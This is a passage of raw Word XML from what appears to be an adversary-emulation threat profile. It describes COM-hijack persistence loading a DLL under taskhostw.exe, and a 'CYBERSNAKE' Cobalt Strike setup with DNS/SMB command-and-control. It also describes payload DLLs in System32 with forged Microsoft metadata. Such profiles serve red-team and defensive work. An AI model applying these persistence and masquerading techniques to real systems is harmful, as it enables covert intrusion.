          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71287313" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">User Level persistence where COM Object Handler loads DLL at user logon under </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>taskhostw.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="37D391DE" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>$Description = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>SystemSoundsService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>$CLSID = '{2DEA658F-54C1-4227-AF9B-260AB5FC3543}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E6C844" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="184745E8" w14:textId="77777777" w:rsidR="00D72461" w:rsidRDefault="00D72461" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31541C80" w14:textId="77777777" w:rsidR="00D72461" w:rsidRDefault="00D72461" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E946B6C" w14:textId="77777777" w:rsidR="00D72461" w:rsidRDefault="00D72461" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB0E665" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>THREAT PROFILE (CYBERSNAKE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542745BF" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>DESCRIPTION</w:t>
      </w:r>
      <w:hyperlink r:id="rId111" w:anchor="description" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01AB9BD7" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">C2 threat inspired by the Snake Campaign &amp; Cyber Espionage Toolkit uses DNS instead of HTTP for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>communications</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2F86265A" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Reference: </w:t>
      </w:r>
      <w:hyperlink r:id="rId112" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>http://www.baesystems.com/en/cybersecurity/feature/the-snake-campaign</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="487A1AB9" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CHARACTERISTICS</w:t>
      </w:r>
      <w:hyperlink r:id="rId113" w:anchor="characteristics" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F5FF564" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">C2 Backend: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CobaltStrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F55AA0F" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port(s): 53, 445 (DNS, SMB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4469EC26" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C2 communication using DNS and SMB Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E953A75" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Executes in browser only when browser is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>active</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2DF06D60" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">IP communication using DNS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hostnames</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7BA0D1AA" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Cobalt Strike HTTP Request Profile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63986622" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68931E76" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SYSTEM MODIFICATIONS</w:t>
      </w:r>
      <w:hyperlink r:id="rId114" w:anchor="system-modifications" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F047539" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>FILES</w:t>
      </w:r>
      <w:hyperlink r:id="rId115" w:anchor="files" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1911FC2D" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SMB PAYLOAD</w:t>
      </w:r>
      <w:hyperlink r:id="rId116" w:anchor="smb-payload" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6204168C" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>PATH: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8BB00"/>
        </w:rPr>
        <w:t>C:\Windows\System32\KBDUS1.DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E1EEA5" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">Binary modified using a resource hacker to look similar to other Windows </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>files</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="638D1E75" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>File Description: United States Keyboard Layout Alternate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D66BA3" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>File Version: 6.1.7601.17514</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EC0CBB" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Product Name: Microsoft(r) Windows(r) Operating System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B12478" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Product Version: 6.1.7601.17514</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D0F4D3" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Copyright: (c)Microsoft Corporation. All right reserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164D056B" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Date Modified: 11/20/2010 4:29:11 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D58748" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DNS PAYLOAD</w:t>
      </w:r>
      <w:hyperlink r:id="rId117" w:anchor="dns-payload" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51B38B7A" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>PATH: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8BB00"/>
        </w:rPr>
        <w:t>c:\windows\system32\wanAPI.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFABB9B" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">Binary modified using a resource hacker to look similar to other Windows </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
